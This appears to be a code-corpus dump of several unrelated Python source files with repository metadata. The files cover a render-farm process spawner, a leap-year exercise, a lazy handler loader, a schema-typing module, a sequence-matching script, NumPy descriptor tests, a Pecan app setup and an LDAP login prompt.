''' Used by Worker to spawn a new process. ''' __author__ = "Olivier Derpierre" __copyright__ = "Copyright 2009, Mikros Image" import logging import os import subprocess import resource from octopus.worker import settings LOGGER = logging.getLogger("main.process") CLOSE_FDS = (os.name != 'nt') def setlimits(): # the use of os.setsid is necessary to create a processgroup properly for the commandwatcher # it creates a new session in which the cmdwatcher is the leader of the new process group os.setsid() # set the limit of open files for ddd soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) try: if settings.LIMIT_OPEN_FILES < hard: resource.setrlimit(resource.RLIMIT_NOFILE, (settings.LIMIT_OPEN_FILES, hard)) except Exception, e: LOGGER.error("Setting ressource limit failed: RLIMT_NOFILE [%r,%r] --> [%r,%r]" % (soft, hard, settings.LIMIT_OPEN_FILES, hard)) raise e def spawnCommandWatcher(pidfile, logfile, args, env): ''' logfile is a file object ''' devnull = file(os.devnull, "r") # normalize environment envN = os.environ.copy() for key in env: envN[str(key)] = str(env[key]) LOGGER.info("Starting subprocess, log: %r, args: %r" % (logfile, args)) try: # pid = subprocess.Popen(args, bufsize=-1, stdin=devnull, stdout=logfile, # stderr=subprocess.STDOUT, close_fds=CLOSE_FDS, # preexec_fn=setlimits, env=envN).pid process = subprocess.Popen( args, bufsize=-1, stdin=devnull, stdout=logfile, stderr=logfile, close_fds=CLOSE_FDS, preexec_fn=setlimits, env=envN) except Exception, e: LOGGER.error("Impossible to start subprocess: %r" % e) raise e file(pidfile, "w").write(str(process.pid)) return CommandWatcherProcess(process, pidfile, process.pid) class CommandWatcherProcess(object): def __init__(self, process, pidfile, pid): self.process = process self.pidfile = pidfile self.pid = pid def kill(self): '''Kill the process.''' if os.name != 'nt': from signal import SIGTERM from errno import ESRCH # PHASE 1 try: # do not kill the process, kill the whole process group! LOGGER.warning("Trying to kill process group %s" % str(self.pid)) os.killpg(self.pid, SIGTERM) return except OSError, e: LOGGER.error("A problem occured") # If the process is dead already, let it rest in peace. # Else, we have a problem, so reraise. if e.args[0] != ESRCH: raise # PHASE 2 try: # the commandwatcher did not have time to setpgid yet, let's just kill the process # FIXME there still is room for a race condition there os.kill(self.pid, SIGTERM) except OSError, e: # If the process is dead already, let it rest in peace. # Else, we have a problem, so reraise. if e.args[0] != ESRCH: raise # PHASE 3 try: # attempt to fix a race condition: # if we kill the watcher but the watcher had the time to # create processgroup and start another process in between # phases 1 and 2, then attempt to kill the processgroup. os.killpg(self.pid, SIGTERM) except OSError, e: # If the process is dead already, let it rest in peace. # Else, we have a problem, so reraise. if e.args[0] != ESRCH: raise else: os.popen("taskkill /PID %d" % self.pid)
UTF-8
Python
false
false
2,014
7,078,106,134,197
94ab2f3139e3ffa199f0f2f9b40b98b273cb64c4
98c6ea9c884152e8340605a706efefbea6170be5
/examples/data/Assignment_2/ndxyen001/question1.py
a783e1790bd3b72d9cafeb4021d52e64ef8d368d
[]
no_license
MrHamdulay/csc3-capstone
https://github.com/MrHamdulay/csc3-capstone
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
refs/heads/master
2021-03-12T21:55:57.781339
2014-09-22T02:22:22
2014-09-22T02:22:22
22,372,174
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Yentl Naidu (NDXYEN001) # 14 March 2014 # Assignment 2 year= eval(input("Enter a year: \n")) if (year%400 ==0): print( str(year), "is a leap year.") elif(year%4==0 and year%100>0): print( str(year), "is a leap year.") else: print( str(year), "is not a leap year.")
UTF-8
Python
false
false
2,014
14,250,701,532,935
584d61b0847c65baca43054c5189a65d7b5100d3
cbc956d5e325f882124c58e0cd1893edec2ddcb4
/lib/LazyControllerLoader.py
6772476ce9e6d0ccd9aa6ff549025a994fd2318c
[]
no_license
dound/CraigNotes
https://github.com/dound/CraigNotes
1e90581b5aa5e5e31f7d21845bbbbda37ddd347c
40aeb38397041d042b7497c6090d75a03d751dd6
refs/heads/master
2021-01-01T05:38:06.487865
2011-04-21T05:30:20
2011-04-21T05:30:20
1,643,929
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
def _istring(import_name): """Imports an object based on a string. @param import_name the dotted name for the object to import. @return imported object """ module, obj = import_name.rsplit('.', 1) # __import__ can't handle unicode strings in fromlist if module is a package if isinstance(obj, unicode): obj = obj.encode('utf-8') return getattr(__import__(module, None, None, [obj]), obj) class _lazy(object): """Handles lazily importing and instantiating a class.""" def __init__(self, path): """Specify the path to the class to lazily import and instantiate.""" self.path = path self.name = path.split(".")[-1] self.cls = None def __call__(self): """Import the specified class and return a new instantiation of it.""" if not self.cls: self.cls = _istring(self.path) return self.cls() def url_list(mappings): """Creates a webapp-compatible list of URL mappings from mappings from URL patterns (like the default) -> string containing the path to the request handler object. The values in the returned list are wrappers around the handler objects which only perform the import of the handler when actually called. """ return [(m[0], _lazy(m[1])) for m in mappings]
UTF-8
Python
false
false
2,011
16,630,113,408,874
8604c2419b4055e5beabaafbdcfbaf292d476d3f
c29892f808bd0f2bb19efea2a73f4ac42e9ee9f0
/src/tkacz/mapper/__init__.py
61428a0b9258d304df2aae6462372b265a55ea79
[ "AGPL-3.0-or-later", "AGPL-3.0-only" ]
non_permissive
thblt/tkacz-deprecated-first-attempt
https://github.com/thblt/tkacz-deprecated-first-attempt
6e55199c9675672b5997e448ea8ca8c2105404a1
c4a793074504aca74485baa75dd0d0ad41aae060
refs/heads/master
2015-08-03T18:55:16.642455
2013-11-01T19:22:13
2013-11-01T19:22:13
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/Library/Frameworks/Python.framework/Versions/3.3/bin/python3.3 import copy """ Defines the abstract types, objects and extensions used by Tkacz. This is the very basic API for a schema. """ class TZAbstractDatum( object ): tzType = property( lambda self: self.__class__.__module__ + '.' + self.__class__.__name__ ) def set( self, value ): raise Exception( "Direct input unavailable for {0}".format( self.tzType ) ) ########################################################################################## # Primitives # ########################################################################################## class TZPrimitive( TZAbstractDatum ): ''' A TZPrimitive is a single piece of data. Types are made of primitives or other Types. Primitives are only used in Types. Cards can't be Primitives only. The standard definition of a Primitive is a) it has no member data and b) it (should) serializes to a string instead of a dict. ''' def set( self, value ): self._value = self.decode( value ) value = property( lambda self: self._value, set ) def __init__(self): self._value = None self.__tzDict__ = dict() def __repr__(self): return (str(self._value)) def serialize (self): return self._value class TZString( TZPrimitive ): """ A String """ def decode( self, value ): return str( value ) class TZBoolean( TZPrimitive ): def decode( self, value ): return bool( value ) def __init__( self, default=False ): super(TZBoolean, self).__init__() self.default = property( default ) class TZInteger( TZPrimitive ): def decode( self, value ): return int( value ) class TZFloat( TZPrimitive ): def decode( self, value ): return float( value ) class TZList( TZPrimitive ): pass class TZSet( TZPrimitive ): pass class TZOneOf( TZPrimitive ): def __init__( self, values ): super(TZOneOf, self).__init__() self.amongst = values def decode(self, val): if val in self.amongst: self._value = val else: raise Exception("Illegal input.") class TZSomeOf( TZPrimitive ): def __init__( self, values ): self.values = property( values ) ########################################################################################## # Types # ########################################################################################## class TZType( TZAbstractDatum ): ''' A Type is a the description of a meaningful set of other types and primitives. It can be represented by a Python dict. Warning, there's some black magic here. TZTypes are meant to be easy to create, and making a new type is as simple as adding fields such as: something = TZString() to a new class inheriting TZTypes. When instantiating the object, it creates an internal dictionary (at instance level) to hold the effective values, and uses ''' def __setattr__(self, name, val): target = getattr(self, name) if isinstance(target, TZAbstractDatum): return target.set(val) else: target = val def serialize(self): out = dict() for name, val in self.__dict__.items(): out[name] = val.serialize() return out def __init__( self ): # Copy class objects into instance objects. for name, value in self.__class__.__dict__.items(): if isinstance( value, TZAbstractDatum ): object.__setattr__(self, name, copy.copy(value)) class TZDocument( TZType ): __tzCollection__ = 'cards' __tzDocId = 14 def serialize(self, atRoot = False): if atRoot: out = super(TZDocument, self).serialize() else: out = { '_link': True } out['_type'] = self.tzType out['_id'] = self.__tzDocId return out ########################################################################################## # Tests # ########################################################################################## class TZTest( object ): pass class IfEquals( TZTest ): def __init__( self, prop, value ): self._property = prop self._value = value def evaluate( self, target ): return target.findProperty( self._property ).equals( self._value )
UTF-8
Python
false
false
2,013
3,418,794,019,262
801e63657bb43e6cdf7a5121c2b8a054445785ec
7f20b1bddf9f48108a43a9922433b141fac66a6d
/csplugins/trunk/ucsd/rsaito/rs_Progs/rs_Python/rs_Python_Pack/tags/rs_Python_Pack080114/IVV_Packages/IVV_Info/IVV_RefSeq_match2.py
95587203f3a02df338fef671efdfd603a8ce90d4
[]
no_license
ahdahddl/cytoscape
https://github.com/ahdahddl/cytoscape
bf783d44cddda313a5b3563ea746b07f38173022
a3df8f63dba4ec49942027c91ecac6efa920c195
refs/heads/master
2020-06-26T16:48:19.791722
2013-08-28T04:08:31
2013-08-28T04:08:31
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import sys import string import os from IVV_Packages.IVV_Info.IVV_info1 import IVV_info from IVV_Packages.IVV_Info.IVV_filter1 import IVV_filter from Seq_Packages.Seq.MultiFasta2 import MultiFasta from Seq_Packages.Seq.Fasta_align_pack2 import Ssearch from Seq_Packages.Homology.Homology_descr4 import HomologyDescr from Seq_Packages.Homology.Homology_term1 import * from General_Packages.Data_Struct.MultiDimDict1 import MultiDimDict class IVV_RefSeq_match: def set_db(self, ivv_info, ivvseqdb, refseqdb): self.ivv_info = ivv_info self.ivvseqdb = ivvseqdb self.refseqdb = refseqdb self.ivvseq = MultiFasta(self.ivvseqdb) self.refseq = MultiFasta(self.refseqdb) self.refseq_version = {} self.refseqid_valid = MultiDimDict(1, 0) def set_fastacmd_path(self, path): """ You can use this method only after setting self.ivvseq """ self.ivvseq.set_fastacmd_EXEC(path) def set_fastaexec_path(self, path): self.fastaexec_path = path def set_match_result_file(self, filename): self.match_result_file = filename def match_all(self): prey_info = self.ivv_info.Prey_info() fh = open(self.match_result_file, "w") fh.write(string.join(( t_query_ID, t_subject_ID, t_e_value, t_identity_abs, t_positive_abs, t_overlap, t_query_len, t_subject_len, t_query_start, t_query_end, t_subject_start, t_subject_end), "\t") + "\n") count = 0 for ivvseqid in prey_info.preys(): refseqid = prey_info.get_qual_noerror(ivvseqid, "hit_refseqid") if not refseqid: continue refseqid, version = refseqid.split(".") self.refseq_version[ refseqid ] = version ss = self.fasta_match(ivvseqid, refseqid) if ss != False: fh.write(string.join(( ivvseqid, refseqid, `ss.eval()`, `int(ss.ident() * ss.overlp())`, # Correct ? `int(ss.similar() * ss.overlp())`, # Correct ? `ss.overlp()`, `ss.q_len()`, `ss.s_len()`, `ss.q_start()`, `ss.q_end()`, `ss.s_start()`, `ss.s_end()`), "\t") + "\n") self.refseqid_valid.plus_val((refseqid,), 1) count += 1 if count % 1000 == 0: sys.stderr.write("Processed " + `count` + " sequences.\n") sys.stderr.write("Processed " + `count` + " sequences.\n") fh.close() def load_match(self, match_result_file): self.match = HomologyDescr(match_result_file) return self.match def fasta_match(self, ivvseqid, refseqid): ivvseq_single = self.ivvseq.get_singlefasta(ivvseqid) refseq_single = self.refseq.get_singlefasta(refseqid) if refseq_single is None: return False else: ss = Ssearch() ss.set_fasta_obj(ivvseq_single, refseq_single) ss.exec_fasta() ss.parse_result() ret = ss return ret def output_related_refseqids(self, filename): refseqids = self.refseqid_valid.get_all_data().keys() refseqid_to_geneid = {} refseqid_to_symbol = {} prey_info = self.ivv_info.Prey_info() for ivvseqid in prey_info.preys(): refseqid = prey_info.get_qual_noerror(ivvseqid, "hit_refseqid") if not refseqid: continue refseqid = refseqid.split(".")[0] geneid = prey_info.geneid(ivvseqid) symbol = prey_info.genesymbol(ivvseqid) refseqid_to_geneid[ refseqid ] = geneid refseqid_to_symbol[ refseqid ] = symbol fh = open(filename, "w") for refseqid in refseqids: refseq = MultiFasta(self.refseqdb) seqobj = refseq.get_singlefasta(refseqid) seqobj.set_ID("lcl|" + refseqid + " " + refseqid_to_geneid[ refseqid ] + " " + refseqid_to_symbol[ refseqid ] + " " + "(" + refseqid + "." + self.refseq_version[refseqid] + ")") fh.write(seqobj.get_singleseq().return_fasta(60) + "\n") fh.close() if __name__ == "__main__": from General_Packages.Usefuls.rsConfig import RSC_II rsc = RSC_II("rsIVV_Config") filter = IVV_filter() filter.set_Prey_filter_file(rsc.PreyFilter) sys.stderr.write("Reading IVV information ...\n") ivv_info = IVV_info(rsc.IVVInfo, filter) ivm = IVV_RefSeq_match() ivm.set_db(ivv_info, rsc.IVVSeq, rsc.RefSeq_RNA_Human) """ This part should be used to calculate relationship between IVV and RefSeq ivm.set_match_result_file(rsc.HomolIVVRefSeq_Ssearch) ivm.match_all() ivm.output_related_refseqids(rsc.IVVRefSeq_MatchSeq) """ homol = ivm.load_match(rsc.HomolIVVRefSeq_Ssearch) query = "T060407_H07_K03.seq" subject = "NM_004082" ss = ivm.fasta_match(query, subject) print ss.q_start(), "-", ss.q_end() print ss.s_start(), "-", ss.s_end() print homol.query_start(query, subject), homol.query_end(query, subject) print homol.subject_start(query, subject), homol.subject_end(query, subject)
UTF-8
Python
false
false
2,013
5,068,061,439,490
cfe348c0c4621fa251ec65b71789cd20b8068633
e4712c4828b2970fa042af9b1c95dc82dbb8cb0d
/doc/django/model-files/contact/models.py
ca00e0e9aaa3a553c20e4a74d33598059fc1beb0
[]
no_license
Mark-Seaman/50-Tricks
https://github.com/Mark-Seaman/50-Tricks
3becf8d43b4db4b9f2032c45e5ce0464d9472a9e
bbf9009eb37f82517128557dc9a44afe470ed450
refs/heads/master
2016-08-05T05:28:17.655817
2014-07-14T15:03:39
2014-07-14T15:03:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# models.py # Demonstrate many to many relationships from django.db import models from contact import Contact from company import Company #----------------------------------------------------------------------------- # Usage of models def clear(): Contact.objects.all().delete() Company.objects.all().delete() def print_contact(contact): for x in contact.table(): print ' %-10s: %s' % (x[0],x[1]) if len(contact.company_set.all())>0: print ' %-10s: '%'companies', print ', '.join([ c.name for c in contact.company_set.all() ]) print def print_company(company): for x in company.table(): print ' %-10s: %s' % (x[0],x[1]) if len(company.contacts.all())>0: print ' %-10s: '%'contacts', print ', '.join([ c.name for c in company.contacts.all() ]) print def print_all_companies(): contacts = Contact.objects.all() print ('-' * 77) print "Contacts: %d records found"%len(contacts) for c in contacts: print_contact(c) def print__all_contacts(): companies = Company.objects.all() print ('-' * 77) print 'Companies: %d records found'%len(companies) for c in companies: print_company(c) def get_contact(name): contacts = Contact.objects.filter(name=name) if len(contacts)<1: return Contact() else: return contacts[0] def get_company(name): c = Company.objects.filter(name=name) if len(c)<1: return Company() else: return c[0] def add_fake_contact(name): c = get_contact(name) c.name = name c.address = 'Here' c.phone = '900-555-1212' c.save() return c def add_fake_company(name): c = get_company(name) c.name = name c.address = 'There you are' c.phone = '303-555-1212' c.save() return c def assign(contact,company): add_fake_contact(contact) add_fake_company(company) get_company(company).contacts.add(get_contact(contact)) def test_code(): #clear() assign('Don', 'Impact Group') assign('Brad', 'Impact Group') assign('Eric', 'Impact Group') assign('Mark', 'Impact Group') assign('Ron', 'App Thumper') assign('Steph', 'App Thumper') assign('Mark', 'App Thumper') assign('Mark', 'Shrinking World Solutions') assign('Eric', 'Shrinking World Solutions') print_all_companies() print__all_contacts()
UTF-8
Python
false
false
2,014
4,320,737,131,117
b003e456948e697cca8e45b262a67eeee654b9c0
427eeba8363d795ff8102935c1a1723fdc57fd10
/src/fts.py
fa987cba05e8d4e34661382dac85d75ad40155d3
[]
no_license
fractaledmind/alfred-index-demo
https://github.com/fractaledmind/alfred-index-demo
b0d819dbda2cdfe8632de0e2ea756526895076da
387b59fdf7d38af4f55a763b01304c043638c02f
refs/heads/master
2021-01-22T16:25:48.874904
2014-12-27T07:41:37
2014-12-27T07:41:37
28,462,793
2
1
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # encoding: utf-8 from __future__ import print_function, unicode_literals import sqlite3 import struct from os import path class FTSDatabase(object): def __init__(self, data, file=None): self.data = data self._file = file or ':memory:' self._table = 'filter' self._fields = 'id, data' self._tokenizer = 'simple' self.con = sqlite3.connect(self._file) # Properties ------------------------------------------------------------- @property def file(self): return self._file @file.setter def file(self, value): self._file = value @property def table(self): return self._table @table.setter def table(self, value): self._table = value @property def fields(self): return self._fields @fields.setter def fields(self, value): self._fields = value @property def tokenizer(self): return self._tokenizer @tokenizer.setter def tokenizer(self, value): self._tokenizer = value # API -------------------------------------------------------------------- def create(self, table=None, fields=None, tokenizer=None): # Allow for dynamic table and field names self.table = table or self._table self.fields = fields or self._fields self.tokenizer = tokenizer or self._tokenizer with self.con: cur = self.con.cursor() # Create virtual table if new database if not path.exists(self.file) or path.getsize(self.file) == 0: print('creating...') sql = ('CREATE VIRTUAL TABLE {table} ' 'USING fts3({columns}, tokenize={tokenizer})') sql = sql.format(table=self.table, columns=self.fields, tokenizer=self.tokenizer) self._execute(cur, sql) # Fill and index virtual table sql = None for i, item in enumerate(self.data): values = self._prepare_values(i, item) if not sql: sql = ('INSERT OR IGNORE INTO {table} ' '({columns}) VALUES ({data})') sql = sql.format(table=self.table, columns=self.fields, data=', '.join('?' * len(values))) cur.execute(sql, values) def search(self, query, ranks=None): # If user runs `search` first, bootstrap database # with default `table`, `fields`, and `tokenizer`. self.create() # nested SELECT to keep from calling the rank function # multiple times per row. sql = ('SELECT * FROM ' '(SELECT rank(matchinfo({table})) ' 'AS score, {columns} ' 'FROM {table} ' 'WHERE {table} MATCH ?) ' 'ORDER BY score DESC;').format(table=self.table, columns=self.fields) # `sqlite3.Row` provides both index-based and # case-insensitive name-based access to columns # with almost no memory overhead self.con.row_factory = sqlite3.Row with self.con: cur = self.con.cursor() ranks = ranks or [1.0] * len(self.fields) self.con.create_function('rank', 1, self.make_rank_func(ranks)) cur.execute(sql, (query,)) return cur.fetchall() ## Helper Methods -------------------------------------------------------- def _execute(self, cur, sql): try: cur.execute(sql) except sqlite3.OperationalError as err: exists_error = b'table {} already exists'.format(self.table) if err.message == exists_error: pass elif b'malformed MATCH' in err.message: return 'Invalid query' else: raise err def _prepare_values(self, i, item): values = [i, item] if hasattr(item, '__iter__'): values = [self._quote(self._unquote(x)) for x in item] return values @staticmethod def _quote(text): return '"' + text + '"' @staticmethod def _unquote(text): return text.replace('"', "'") @staticmethod def make_rank_func(weights): """Search ranking function. Use floats (1.0 not 1) for more accurate results. Use 0 to ignore a column. Adapted from <http://goo.gl/4QXj25> and <http://goo.gl/fWg25i> :param weights: list or tuple of the relative ranking per column. :type weights: :class:`tuple` OR :class:`list` :returns: a function to rank SQLITE FTS results :rtype: :class:`function` """ def rank(matchinfo): """ `matchinfo` is defined as returning 32-bit unsigned integers in machine byte order (see http://www.sqlite.org/fts3.html#matchinfo) and `struct` defaults to machine byte order. """ bufsize = len(matchinfo) # Length in bytes. matchinfo = [struct.unpack(b'I', matchinfo[i:i + 4])[0] for i in range(0, bufsize, 4)] it = iter(matchinfo[2:]) return sum(x[0] * w / x[1] for x, w in zip(zip(it, it, it), weights) if x[1]) return rank
UTF-8
Python
false
false
2,014
128,849,061,578
3bc5abb32020bab9f6fb1efa9a7d39de057c2563
c86fcaba53e8c776c6d5e2c05b9a16d851080fa5
/main.py
abd28172ca892451cfddbb5e9a0e197805f021a4
[]
no_license
ramonesteban/research
https://github.com/ramonesteban/research
d9332139e4e0406524c2182908c2c428174d2b43
51d458de0d722543e691eb91afc915346b927962
refs/heads/master
2021-01-22T11:41:31.239236
2014-05-27T04:43:04
2014-05-27T04:43:04
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import sys, os import Image from pytesser import * from test_filters import * def main(): if len(sys.argv) > 1: image_file_path = sys.argv[1] if os.path.isfile(image_file_path): try: if sys.argv[2] == 'print': run_tests(image_file_path, True) else: run_tests(image_file_path, False) except: run_tests(image_file_path, False) else: print 'Image file does not exist' else: print 'First parameter must be an image file name' if __name__ == '__main__': main()
UTF-8
Python
false
false
2,014
10,849,087,393,659
8f4c2ab43c908a078e5c6107bf236da2547ba6c5
840135800304d6c3c60951eb209907ecbc739988
/blaze/datadescriptor/tests/test_numpy_data_descriptor.py
30501871957486bc7222e6a566e1d527889c6fa6
[ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause" ]
non_permissive
aashish24/blaze
https://github.com/aashish24/blaze
554736ca970c59207d2810fe85f98bdd0cab5304
1e840c4e09eeb39a438e6568462b9eb6e288d866
refs/heads/master
2020-12-25T05:34:24.470753
2013-06-18T08:28:50
2013-06-18T08:29:11
10,772,911
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import unittest import numpy as np import blaze from blaze import datashape from blaze.datadescriptor import (NumPyDataDescriptor, IDataDescriptor, IElementReader, IElementReadIter, IElementWriter, IElementWriteIter, dd_as_py) from blaze.py3help import _inttypes, izip import ctypes class TestNumPyDataDescriptor(unittest.TestCase): def test_basic_object_type(self): self.assertTrue(issubclass(NumPyDataDescriptor, IDataDescriptor)) a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Make sure the right type is returned self.assertTrue(isinstance(dd, IDataDescriptor)) self.assertEqual(dd_as_py(dd), [[0,1,2], [3,4,5]]) def test_descriptor_iter_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Iteration should produce NumPyDataDescriptor instances vals = [] for el in dd: self.assertTrue(isinstance(el, NumPyDataDescriptor)) self.assertTrue(isinstance(el, IDataDescriptor)) vals.append(dd_as_py(el)) self.assertEqual(vals, [[0,1,2], [3,4,5]]) def test_descriptor_getitem_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Indexing should produce NumPyDataDescriptor instances self.assertTrue(isinstance(dd[0], NumPyDataDescriptor)) self.assertEqual(dd_as_py(dd[0]), [0,1,2]) self.assertTrue(isinstance(dd[1,2], NumPyDataDescriptor)) self.assertEqual(dd_as_py(dd[1,2]), 5) def test_element_iter_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Requesting element iteration should produce an # IElementReadIter object ei = dd.element_read_iter() self.assertTrue(isinstance(ei, IElementReadIter)) # Iteration over the IElementReadIter object should produce # raw ints which are pointers for ptr in ei: self.assertTrue(isinstance(ptr, _inttypes)) def test_element_getitem_types(self): a = np.arange(6).reshape(2,3) dd = NumPyDataDescriptor(a) # Requesting get_element with one index should produce an # IElementReader object ge = dd.element_reader(1) self.assertTrue(isinstance(ge, IElementReader)) # Iteration over the IElementReadIter object should produce # raw ints which are pointers self.assertTrue(isinstance(ge.read_single((1,)), _inttypes)) # Requesting element reader with two indices should produce an # IElementReader object ge = dd.element_reader(2) self.assertTrue(isinstance(ge, IElementReader)) # Iteration over the IElementReadIter object should produce # raw ints which are pointers self.assertTrue(isinstance(ge.read_single((1,2)), _inttypes)) def test_element_write(self): a = np.array([1, 2, 3, 4, 5], dtype=np.int32) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) ge = dd.element_writer(1) self.assertTrue(isinstance(ge, IElementWriter)) x = ctypes.c_int32(123) ge.write_single((1,), ctypes.addressof(x)) self.assertEqual(dd_as_py(dd), [1,123,3,4,5]) with ge.buffered_ptr((3,)) as dst_ptr: x = ctypes.c_int32(456) ctypes.memmove(dst_ptr, ctypes.addressof(x), 4) self.assertEqual(dd_as_py(dd), [1,123,3,456,5]) def test_element_iter_write(self): a = np.array([1, 2, 3, 4, 5], dtype=np.int32) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) with dd.element_write_iter() as ge: self.assertTrue(isinstance(ge, IElementWriteIter)) for val, ptr in izip([5,7,4,5,3], ge): x = ctypes.c_int32(val) ctypes.memmove(ptr, ctypes.addressof(x), 4) self.assertEqual(dd_as_py(dd), [5,7,4,5,3]) def test_element_write_buffered(self): a = np.array([1, 2, 3, 4, 5], dtype=np.dtype(np.int32).newbyteorder()) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) self.assertFalse(dd.npyarr.dtype.isnative) ge = dd.element_writer(1) self.assertTrue(isinstance(ge, IElementWriter)) x = ctypes.c_int32(123) ge.write_single((1,), ctypes.addressof(x)) self.assertEqual(dd_as_py(dd), [1,123,3,4,5]) with ge.buffered_ptr((3,)) as dst_ptr: x = ctypes.c_int32(456) ctypes.memmove(dst_ptr, ctypes.addressof(x), 4) self.assertEqual(dd_as_py(dd), [1,123,3,456,5]) def test_element_iter_write_buffered(self): a = np.array([1, 2, 3, 4, 5], dtype=np.dtype(np.int32).newbyteorder()) dd = NumPyDataDescriptor(a) self.assertEqual(dd.dshape, datashape.dshape('5, int32')) with dd.element_write_iter() as ge: self.assertTrue(isinstance(ge, IElementWriteIter)) for val, ptr in izip([5,7,4,5,3], ge): x = ctypes.c_int64(val) ctypes.memmove(ptr, ctypes.addressof(x), 8) self.assertEqual(dd_as_py(dd), [5,7,4,5,3]) if __name__ == '__main__': unittest.main()
UTF-8
Python
false
false
2,013
2,774,548,893,108
ccebf70621ff118f36d9850941249a50ba708a3d
3927e4048fbef289fb85ace47ca20e62edb88992
/skb/app.py
79a0f5c17f6da5a42a1a32dc11accfbc7bdeeabe
[]
no_license
sechastain/SKB
https://github.com/sechastain/SKB
e39914949ff10ebe7ba0a65c387497dff2cc418e
be0f96684713e1b8f1e116ff311ecc6e150dc7a2
refs/heads/master
2016-11-02T06:56:18.577962
2012-03-10T02:44:28
2012-03-10T02:44:28
3,442,080
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from pecan import make_app from pecan.hooks import TransactionHook from skb import model from skb.controllers.root import RootController def setup_app(config): model.init_model() return make_app( RootController(), # config.app.root, static_root = config.app.static_root, debug = config.app.debug, logging = config.app.logging, template_path = config.app.template_path, force_canonical = config.app.force_canonical, hooks = [ TransactionHook( model.start, model.start_ro, model.commit, model.rollback, model.clear ) ] )
UTF-8
Python
false
false
2,012
10,720,238,379,886
6191bb8c749ad2d34c3afb09c05822c84475ab0b
0be52e0a7d788088bc5a79559b9bb2532d17a210
/lib/ldapalchemy/cli/logindialog.py
59c93939cd8ffcb20cbd5598f9288770dd627ee0
[]
no_license
clebergnu/ldapalchemy
https://github.com/clebergnu/ldapalchemy
e3439a6b45ab9b9b45fc2548faf7b8fe402586c7
af3b021a5b9ebad337c6665a56b6428f42daf18c
refs/heads/master
2021-01-20T09:01:38.517110
2010-10-20T17:15:42
2010-10-20T17:15:42
1,009,678
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- Mode: Python; coding: iso-8859-1 -*- # vi:si:et:sw=4:sts=4:ts=4 ## ## This file is part of LDAPAlchemy ## Copyright (C) 2009 Cleber Rodrigues <[email protected]> ## All rights reserved ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## This program is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with this program; if not, write to the Free Software ## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, ## USA. ## ## Author(s): Cleber Rodrigues <[email protected]> ## __all__ = ['LdapLoginDlg'] import ldap import ldapurl import getpass from ldapalchemy.engine import Engine from ldapalchemy.config import DefaultConfig from ldapalchemy.exceptions import LDAPInvalidURI class LdapLoginDialog: ''' A LoginDlg that attempts to establish a connection to a LDAP server ''' def __init__(self): self.config = DefaultConfig def __create_engine(self): ''' Creates the engine. Usually called by run() ''' try: self.engine = Engine(self.config.connection_uri, binddn=self.config.connection_binddn, bindpw=self.config.connection_bindpw) except ldap.NO_SUCH_OBJECT: pass except ldap.INVALID_CREDENTIALS: pass def __input_connection_uri(self): ''' Asks for the connection uri ''' uri = raw_input('Enter LDAP server URI [%s]: ' \ % self.config.connection_uri) if not uri: return self.config.connection_uri if not ldapurl.isLDAPUrl(uri): raise LDAPInvalidURI return uri def __input_connection_binddn(self): ''' Asks for the connection binddn ''' binddn = raw_input('Enter the bind DN [%s]: ' \ % self.config.connection_binddn) return binddn def __input_connection_bindpw(self): ''' Asks for the connection binddn ''' bindpw = getpass.getpass('Enter the bind password [********]: ') return bindpw def __input_connection(self): try: print 'Connecting to LDAP server...' self.config.connection_uri = self.__input_connection_uri() self.config.connection_binddn = self.__input_connection_binddn() self.config.connection_bindpw = self.__input_connection_bindpw() except KeyboardInterrupt: print 'Cancelled!' except LDAPInvalidURI: print 'Error: Invalid LDAP URI! Exiting...' raise SystemExit def run(self): self.__input_connection() self.__create_engine() return self.engine if __name__ == '__main__': l = LdapLoginDialog() l.run()
UTF-8
Python
false
false
2,010
16,140,487,136,746
2370c7b40718340efd160a3e307b3ca6b796aed0
4e1bfc6c27761efd9292021861437b105825f9e1
/mTurkExperiments/NearHomophone/PhoneticConfusion/getPhoneEditDistance.py
4028a5dfefa677409f9b2a69459fda199e1a62ac
[]
no_license
justinek/pun-paper
https://github.com/justinek/pun-paper
5618ce06c972cbb49f1fe2c7aa12dc354703c6c8
01a6f60989aca5d2d8821e94b1a0b4c1dcee7b9c
refs/heads/master
2016-08-04T22:13:03.636006
2014-07-17T03:09:39
2014-07-17T03:09:39
13,692,338
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
